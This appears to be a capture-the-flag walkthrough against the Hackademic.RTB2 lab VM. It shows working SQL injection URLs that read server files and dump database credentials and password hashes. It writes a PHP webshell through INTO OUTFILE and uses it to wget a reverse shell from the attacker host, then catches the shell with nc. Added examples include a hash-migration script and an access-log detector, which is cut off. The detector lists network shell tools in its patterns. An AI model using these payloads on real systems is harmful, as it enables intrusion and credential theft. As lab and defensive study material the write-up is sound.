Found hash/plain/user = be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX / test / test
Found hash/plain/user = abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy / victim / BTallor
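
The scheme behind those hashes, as an added example (not code from the write-up, from joomla-cracker.pl or from Joomla): Joomla 1.5 stores hex(md5(password + salt)) followed by ':' and the salt, one fast unsalted-style MD5 per guess, which is why a wordlist finishes in seconds. The block verifies the three recovered credentials against the dumped strings and shows the login-time rehash to PBKDF2 a maintainer would add; the function names and the PBKDF2 parameters are this example's own choices.

```python
"""Joomla 1.5 password hashes: verification and login-time migration.

Added example, not code from the write-up or from Joomla. The scheme
reimplemented here is the one the dump uses: md5(password . salt) ':' salt.
Function names and the PBKDF2 parameters are this example's own choices.
"""
import base64
import hashlib
import hmac
import os

# Stored hash strings from the jos_users dump above (username -> hash:salt).
DUMPED = {
    "JSmith": "992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF",
    "BTallor": "abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy",
    "test": "be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX",
}


def legacy_hash(password, salt):
    """Joomla 1.5 'md5-hex' storage: hex(md5(password + salt)) + ':' + salt."""
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return digest + ":" + salt


def verify_legacy(password, stored):
    """Check a candidate against a legacy string; unsalted md5 is also accepted."""
    digest, sep, salt = stored.partition(":")
    if not sep:
        candidate = hashlib.md5(password.encode("utf-8")).hexdigest()
        return hmac.compare_digest(candidate, digest)
    return hmac.compare_digest(legacy_hash(password, salt), stored)


# One MD5 per guess is what makes the wordlist run above finish in seconds;
# a deliberately slow KDF with a random per-user salt is the replacement.
PBKDF2_ROUNDS = 600_000  # OWASP's current figure for PBKDF2-HMAC-SHA256


def pbkdf2_hash(password, salt=None):
    """Return 'pbkdf2_sha256$rounds$salt_b64$dk_b64' using a fresh random salt."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        PBKDF2_ROUNDS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    )


def verify_pbkdf2(password, stored):
    """Constant-time check of a candidate against a pbkdf2_sha256 string."""
    try:
        scheme, rounds, salt_b64, dk_b64 = stored.split("$")
        iterations = int(rounds)
        salt, expected = base64.b64decode(salt_b64), base64.b64decode(dk_b64)
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(dk, expected)


def verify_and_upgrade(password, stored):
    """Login-time check. Returns (ok, replacement): a legacy hash that verifies
    is rehashed, so the md5 form disappears from the table as users log in."""
    if stored.startswith("pbkdf2_sha256$"):
        return verify_pbkdf2(password, stored), None
    if verify_legacy(password, stored):
        return True, pbkdf2_hash(password)
    return False, None


if __name__ == "__main__":
    for user, plain in (("JSmith", "matrix"), ("BTallor", "victim"), ("test", "test")):
        ok, upgraded = verify_and_upgrade(plain, DUMPED[user])
        print(user, ok, (upgraded or "")[:24])
```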

login JSmith / matrix

index.php?option=com_user&view=reset&layout=confirm

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/passwd%27%29
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/apache2/apache2.conf%27%29
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned. 
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#

### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at <URL:http://httpd.apache.org/docs/2.2/mod/mpm_common.html#lockfile>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"

#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#<IfModule !mpm_winnt.c>
#<IfModule !mpm_netware.c>
LockFile /var/lock/apache2/accept.lock
#</IfModule>
#</IfModule>

#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}

#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300

#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On

#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100

#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15

##
## Server-Pool Size Regulation (MPM specific)
##

# prefork MPM
# StartServers: number of server processes to start
# MinSpareServers: minimum number of server processes which are kept spare
# MaxSpareServers: maximum number of server processes which are kept spare
# MaxClients: maximum number of server processes allowed to start
# MaxRequestsPerChild: maximum number of requests a server process serves

<IfModule mpm_prefork_module>
    StartServers          5
    MinSpareServers       5
    MaxSpareServers      10
    MaxClients          150
    MaxRequestsPerChild   0
</IfModule>


# worker MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves

<IfModule mpm_worker_module>
    StartServers          2
    MinSpareThreads      25
    MaxSpareThreads      75
    ThreadLimit          64
    ThreadsPerChild      25
    MaxClients          150
    MaxRequestsPerChild   0
</IfModule>


# event MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves

<IfModule mpm_event_module>
    StartServers          2
    MaxClients          150
    MinSpareThreads      25
    MaxSpareThreads      75
    ThreadLimit          64
    ThreadsPerChild      25
    MaxRequestsPerChild   0
</IfModule>


# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}

#
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives.  See also the AllowOverride
# directive.
#

AccessFileName .htaccess

#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#

<Files ~ "^\.ht">
    Order allow,deny
    Deny from all
    Satisfy all
</Files>


#
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value.  If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain


#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off

# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here.  If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
#
ErrorLog /var/log/apache2/error.log

#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn

# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf

# Include all the user configurations:
Include /etc/apache2/httpd.conf

# Include ports listing
Include /etc/apache2/ports.conf

#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
# If you are behind a reverse proxy, you might want to change %h into %{X-Forwarded-For}i
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

#
# Define an access log for VirtualHosts that don't define their own logfile
CustomLog /var/log/apache2/other_vhosts_access.log vhost_combined


# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.

# Include generic snippets of statements
Include /etc/apache2/conf.d/

# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/



Where is the www-root ???

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/apache2/sites-available/default%27%29


<VirtualHost *:80>
    ServerAdmin webmaster@localhost

    DocumentRoot /var/www/welcome
    <Directory />
        Options FollowSymLinks
        AllowOverride None
    </Directory>

    <Directory /var/www/>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order allow,deny
        allow from all
    </Directory>

    ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
    <Directory "/usr/lib/cgi-bin">
        AllowOverride None
        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
        Order allow,deny
        Allow from all
    </Directory>

    ErrorLog /var/log/apache2/error.log

    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    LogLevel warn

    CustomLog /var/log/apache2/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>
</VirtualHost>

<VirtualHost *:666>
    ServerAdmin webmaster@localhost

    DocumentRoot /var/www
    <Directory />
        Options FollowSymLinks
        AllowOverride None
    </Directory>

    <Directory /var/www/>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order allow,deny
        allow from all
    </Directory>

    ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
    <Directory "/usr/lib/cgi-bin">
        AllowOverride None
        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
        Order allow,deny
        Allow from all
    </Directory>

    ErrorLog /var/log/apache2/error.log

    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    LogLevel warn

    CustomLog /var/log/apache2/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>
</VirtualHost>




http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/welcome/check.php%27%29
<?php
$pass_answer = "' or 1=1--'";
$pass_answer_2 = "' OR 1=1--'";

if($_POST['password'] == $pass_answer or $_POST['password'] == $pass_answer_2){
    echo '<h2>';
    echo 'Ok, nice shot...';
    echo '<br>';
    echo '</h2>';
    echo '...but, you are looking in a wrong place bro! ;-)';
    echo '<br>';
    echo '<br>';
    echo '<font color="black">';
    echo '%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%
33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A';
    echo '</font color="black">';

}

else{
    echo '<h2>';
    echo 'You are trying to login with wrong credentials!';
    echo '<br>';
    echo '</h2>';
    echo "Please try again...";
}
?>

URL decode:

3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e 0d 0a 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 69 6e 27 20 6f 6e 20 68 65 61 76 65 6e 27 73 20 64 6f 6f 72 20 2e 2e 20 3a 29 0d 0a 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 0d 0a 3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e

Hex to ASCII:

<--------->
Knock Knock Knockin' on heaven's door .. :)
00110001 00110000 00110000 00110001 00111010 00110001 00110001 00110000 00110001 00111010 00110001 00110000 00110001 00110001 00111010 00110001 00110000 00110000 00110001
<--------->?

binary to ASCII:

1 0 0 1 : 1 1 0 1 : 1 0 1 1 : 1 0 0 1

binary to hex:

313030313A3131

binary to decimal:

9:13:11:9

decimal to hex:

9:D:B:9

I dunno what this is..... ?????
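
The decode chain above, as an added example (not code from the write-up): check.php echoes a string that is URL-encoded hex of ASCII text whose third line is a row of 8-bit binary groups. decode_layers() peels the URL, hex and binary layers in the order worked by hand above, and interpret_groups() reproduces the decimal and hex readings of the final "1001:1101:1011:1001"; the payload is rebuilt from the decoded text inside the block (constructed input) so it runs offline.

```python
"""Peel the layers of the string that check.php prints.

Added example, not code from the write-up. The echoed string is URL-encoded
hex of ASCII text, and the text's third line is a row of 8-bit binary groups;
decode_layers() performs the URL -> hex -> text -> binary steps worked by hand
above. The payload is rebuilt here from the decoded text (constructed input)
so the block runs offline; interpret_groups() reproduces the decimal and hex
readings of the final string.
"""
from urllib.parse import unquote


def url_layer(encoded):
    """Layer 1: '%33%63%20...' -> '3c 2d ...' (every character was percent-encoded)."""
    return unquote(encoded)


def hex_layer(hex_text):
    """Layer 2: space-separated hex byte pairs -> the text they spell."""
    return bytes.fromhex(hex_text).decode("latin-1")


def binary_layer(bits):
    """Layer 3: '00110001 00110000 ...' -> the characters those octets encode."""
    return "".join(chr(int(octet, 2)) for octet in bits.split())


def decode_layers(payload):
    """Return (decoded text, decoded form of every all-binary line in that text)."""
    text = hex_layer(url_layer(payload))
    lines = text.replace("\r\n", "\n").split("\n")
    binary_lines = [ln for ln in lines if ln and set(ln) <= {"0", "1", " "}]
    return text, [binary_layer(ln) for ln in binary_lines]


def interpret_groups(colon_groups):
    """The two further readings tried above: each colon-separated group taken
    as a binary number, given in decimal and in hex."""
    values = [int(g, 2) for g in colon_groups.split(":")]
    return values, [format(v, "X") for v in values]


# Constructed input: the decoded text, re-encoded the way check.php carries it.
PLAINTEXT = (
    "<--------->\r\n"
    "Knock Knock Knockin' on heaven's door .. :)\r\n"
    + " ".join(format(ord(c), "08b") for c in "1001:1101:1011:1001")
    + "\r\n<--------->"
)
HEX_TEXT = " ".join(format(b, "02x") for b in PLAINTEXT.encode("latin-1"))
PAYLOAD = "".join("%%%02x" % ord(c) for c in HEX_TEXT)  # percent-encode every char


if __name__ == "__main__":
    text, decoded_bits = decode_layers(PAYLOAD)
    print(text)
    for s in decoded_bits:
        print(s, interpret_groups(s))
```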

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/index.php%27%29

<?php
/**
* @version        $Id: index.php 14401 2010-01-26 14:10:00Z louis $
* @package        Joomla
* @copyright    Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license        GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

// Set flag that this is a parent file
define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;

/**
 * CREATE THE APPLICATION
 *
 * NOTE :
 */
$mainframe =& JFactory::getApplication('site');

/**
 * INITIALISE THE APPLICATION
 *
 * NOTE :
 */
// set the language
$mainframe->initialise();

JPluginHelper::importPlugin('system');

// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');

/**
 * ROUTE THE APPLICATION
 *
 * NOTE :
 */
$mainframe->route();

// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);

// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');

/**
 * DISPATCH THE APPLICATION
 *
 * NOTE :
 */
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);

// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');

/**
 * RENDER  THE APPLICATION
 *
 * NOTE :
 */
$mainframe->render();

// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');

/**
 * RETURN THE RESPONSE
 */
echo JResponse::toString($mainframe->getCfg('gzip'));

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/var/www/configuration.php%27%29

<?php
class JConfig {
/* Site Settings */
var $offline = '0';
var $offline_message = 'This site is down for maintenance.<br /> Please check back again soon.';
var $sitename = 'Hackademic.RTB2';
var $editor = 'tinymce';
var $list_limit = '20';
var $legacy = '0';
/* Debug Settings */
var $debug = '0';
var $debug_lang = '0';
/* Database Settings */
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'root';
var $password = 'yUtJklM97W';
var $db = 'joomla';
var $dbprefix = 'jos_';
/* Server Settings */
var $live_site = '';
var $secret = 'iFzlVUCg9BBPoUDU';
var $gzip = '0';
var $error_reporting = '-1';
var $helpurl = 'http://help.joomla.org';
var $xmlrpc_server = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $ftp_enable = '0';
var $force_ssl = '0';
/* Locale Settings */
var $offset = '0';
var $offset_user = '0';
/* Mail Settings */
var $mailer = 'mail';
var $mailfrom = 'admin@hackademirtb2.com';
var $fromname = 'Hackademic.RTB2';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpsecure = 'none';
var $smtpport = '25';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
/* Cache Settings */
var $caching = '0';
var $cachetime = '15';
var $cache_handler = 'file';
/* Meta Settings */
var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';
var $MetaKeys = 'joomla, Joomla';
var $MetaTitle = '1';
var $MetaAuthor = '1';
/* SEO Settings */
var $sef           = '0';
var $sef_rewrite   = '0';
var $sef_suffix    = '0';
/* Feed Settings */
var $feed_limit   = 10;
var $feed_email   = 'author';
var $log_path = '/var/www/logs';
var $tmp_path = '/var/www/tmp';
/* Session Setting */
var $lifetime = '15';
var $session_handler = 'database';
}
?>

http://192.168.56.105/phpmyadmin

login: root / yUtJklM97W

http://192.168.56.105/phpmyadmin/index.php?db=joomla&token=1b7a1750b5f6d69cb6797631710e1959

jos_users Administrator Edit

password: test: be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX

login Administrator / test
empty page...

http://192.168.56.105/phpmyadmin/sql.php?db=mysql&token=1b7a1750b5f6d69cb6797631710e1959&table=user&pos=0

localhost     root     *5D3C124406BF85494067182754131FF4DAB9C6C7
HackademicRTB2     root     *5D3C124406BF85494067182754131FF4DAB9C6C7    
127.0.0.1     root     *5D3C124406BF85494067182754131FF4DAB9C6C7     Y
localhost     debian-sys-maint     *F36E6519B0B1D62AA2D5346EFAD66D1CAF248996
localhost     phpmyadmin     *5D3C124406BF85494067182754131FF4DAB9C6C7

--------------

phpmyadmin SQL query

http://192.168.56.105/phpmyadmin/tbl_sql.php?db=mysql&table=user&token=6ad2011913439a1e1d387f7182dc1322

SELECT '<? system($_GET["c"]); ?>'
INTO OUTFILE "/var/www/evil.php"


http://192.168.56.105:666/evil.php?c=ls%20-al%20/var/www

total 288
drwxrwxrwx 19 p0wnbox  p0wnbox   4096 Nov 14 13:57 .
drwxr-xr-x 16 root     root      4096 Jan 17  2011 ..
-rw-rw-rw-  1 root     root     76539 Nov  3  2010 CHANGELOG.php
-rw-rw-rw-  1 root     root      1172 Jan 26  2010 COPYRIGHT.php
-rw-rw-rw-  1 root     root     14918 Nov  2  2010 CREDITS.php
-rw-rw-rw-  1 root     root      4344 Jan 26  2010 INSTALL.php
-rw-rw-rw-  1 root     root     17816 Jan 17  2009 LICENSE.php
-rw-rw-rw-  1 root     root     27986 Jan 26  2010 LICENSES.php
-rwxrwxrwx  1 root     root     21697 Jan 17  2011 Untitledt.png
drwxrwxrwx  7 root     root      4096 Nov  3  2010 _installation
drwxrwxrwx  2 root     root      4096 Jan 22  2011 administrator
drwxrwxrwx  2 root     root      4096 Nov  3  2010 cache
drwxrwxrwx 15 root     root      4096 Jan 22  2011 components
-rw-rw-rw-  1 www-data www-data  1793 Jan 17  2011 configuration.php
-rw-rw-rw-  1 root     root      3411 Jan 26  2010 configuration.php-dist
-rw-rw-rw-  1 mysql    mysql       26 Nov 14 13:57 evil.php
-rw-rw-rw-  1 root     root      2773 Jan 26  2010 htaccess.txt
drwxrwxrwx  6 root     root      4096 Nov  3  2010 images
drwxrwxrwx  8 root     root      4096 Nov  3  2010 includes
-rw-rw-rw-  1 root     root      2049 Jan 26  2010 index.php
-rw-rw-rw-  1 root     root       588 Jan 26  2010 index2.php
-rw-rw-rw-  1 mysql    mysql       20 Nov 14 13:55 info.php
drwxrwxrwx  4 root     root      4096 Nov  3  2010 language
drwxrwxrwx 16 root     root      4096 Nov  3  2010 libraries
drwxrwxrwx  2 root     root      4096 Nov  3  2010 logs
drwxrwxrwx  3 root     root      4096 Nov  3  2010 media
drwxrwxrwx 22 root     root      4096 Nov  3  2010 modules
drwxr-xr-x 11 root     root      4096 Jan 17  2011 pC4Hp8kt@Px8PgkV$!
drwxrwxrwx 11 root     root      4096 Nov  3  2010 plugins
-rw-rw-rw-  1 root     root       304 Aug  8  2006 robots.txt
drwxrwxrwx  7 root     root      4096 Jan 17  2011 templates
drwxrwxrwx  2 root     root      4096 Jan 22  2011 tmp
-rw-rw-rw-  1 mysql    mysql        0 Nov 13 18:25 tmpurwmd.php
-rw-rw-rw-  1 mysql    mysql        0 Nov 13 18:25 tmpuumnf.php
drwxrwxrwx  2 root     root      4096 Nov 14 11:57 welcome
drwxrwxrwx  4 root     root      4096 Nov  3  2010 xmlrpc
-rw-rw-rw-  1 root     root       177 Jan 17  2011 xxx.html

http://192.168.56.105:666/evil.php?c=which%20wget

/usr/bin/wget

192.168.56.105:666/evil.php?c=wget -O phpreverse.php http://192.168.56.101/phpshells/phpreverse.txt

root@kali:~# nc -l -v -p 1234
listening on [any] 1234 ...

http://192.168.56.105:666/phpreverse.php
192.168.56.105: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.105] 59158
Linux HackademicRTB2 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 06:07:29 UTC 2010 i686 GNU/Linux
 14:59:22 up 1 day,  5:10,  0 users,  load average: 0.01, 0.04, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$
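
What this whole chain leaves in the access log, as an added example (not part of the write-up): both vhosts above log with the "combined" LogFormat from the dumped apache2.conf, so every request made here is one parseable line. The block parses that format and flags the request shapes used in the walkthrough: UNION SELECT / load_file() / INTO OUTFILE in the query string, a shell command passed as a query parameter (the evil.php?c=... calls) and the sqlmap User-Agent. The log lines are constructed to mirror those requests and the rule names are this example's own.

```python
"""Detection over Apache 'combined' access-log lines.

Added example, not part of the write-up. It parses the LogFormat "combined"
defined in the apache2.conf dumped above and flags the request shapes the
walkthrough produced: UNION SELECT / load_file() / INTO OUTFILE in the query
string, a shell command passed as a query parameter, and the sqlmap
User-Agent. The sample log lines are constructed; rule names are this
example's own.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# %h %l %u %t "%r" %>s %O "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Injection primitives seen above, matched against the URL-decoded target.
SQLI_RULES = [
    ("sqli.union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("sqli.load_file", re.compile(r"\bload_file\s*\(", re.I)),
    ("sqli.into_outfile", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
]
# A parameter value that starts with a shell command name: webshell traffic.
CMD_RE = re.compile(
    r"^\s*(?:wget|curl|nc|ncat|bash|sh|ls|cat|id|uname|which|whoami|perl|python)\b",
    re.I,
)


def parse_line(line):
    """Fields of one 'combined' line, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\r\n"))
    if m is None:
        return None
    fields = m.groupdict()
    parts = fields["request"].split(" ")
    if len(parts) != 3:  # truncated or malformed request line
        return None
    fields["method"], fields["target"], fields["proto"] = parts
    return fields


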